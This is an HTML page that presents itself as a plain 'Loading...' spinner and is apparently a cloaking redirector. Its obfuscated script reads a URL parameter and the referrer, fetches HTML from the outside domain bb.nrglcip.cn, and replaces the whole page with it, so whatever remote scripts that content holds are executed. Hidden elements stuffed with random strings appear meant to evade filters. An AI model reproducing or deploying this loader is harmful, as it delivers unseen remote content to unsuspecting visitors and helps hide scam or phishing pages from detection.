<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rcOnHr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rcOnHr .P2wzS0eTB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rcOnHr .content {
            line-height: 50px;
            text-align: center
        }

        .rcOnHr .img {
            width: 100%
        }

        .rcOnHr .t4cl8R7 {
            text-align: center
        }

        .rcOnHr .t4cl8R7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rcOnHr .t4cl8R7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rcOnHr .t4cl8R7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rcOnHr .t4cl8R7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rcOnHr .t4cl8R7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rcOnHr .t4cl8R7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rcOnHr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function i1A0vA7Z9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Jm6dYc = i1A0vA7Z9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Jm6dYc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Jm6dYc +".html?a=share";
		}
		
        b8ZbHuFDN=url+"#"+new Date().getTime();
        b8ZbHuFDN && function() {
            $.get(b8ZbHuFDN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>rqZiN6lQEhG5mi3BOM5LjcDrPc53aL</a>
<h1 style='display:none' >YospV8nMlOEsIOb25aHN0alwzAFC0VjrT3YcTb7qKsG4NMivN9</h1>
<img  src='' style='display:none'>
<span style='display:none'>GlxmZ9cSFdtdNueWDXydrfKXV</span>
<a  href='#' style='display:none'>rqZiN6lQEhG5mi3BOM5LjcDrPc53aL</a>
<a  href='#' style='display:none'>rqZiN6lQEhG5mi3BOM5LjcDrPc53aL</a>
<span style='display:none'>GlxmZ9cSFdtdNueWDXydrfKXV</span>
<a  href='#' style='display:none'>rqZiN6lQEhG5mi3BOM5LjcDrPc53aL</a><div class="rcOnHr">
    <div class="P2wzS0eTB">
        <div class="t4cl8R7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >FKnSJGOsyBEpqQl7DKOSQfT</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>oWn7aN658PmvxmoVIJvrIIL4tfvOgreASqIaIWCrMBwsN25BjGb1EVm3cjouZ0gDUBS320B</a>
<b style='display:none' >heuYMkfQ7RPXyRigiIBXXKRJn5ZAJUA35JCdDwo3eqTz4sifs5yNGGkHH84K75fc5e0w2vaQAFFbR1PBeVElvPpUIwo</b>
<li style='display:none' >EvXOKjCYaxHRlebOsVVHBPbbrmByslmPURTpk4ZSR6X4p3PToL402MAGkikcRfy4s2YX7jN5TFwpIlKT5EsX9v5MQVL</li>
<a  href='#' style='display:none'>oWn7aN658PmvxmoVIJvrIIL4tfvOgreASqIaIWCrMBwsN25BjGb1EVm3cjouZ0gDUBS320B</a></body>
</html>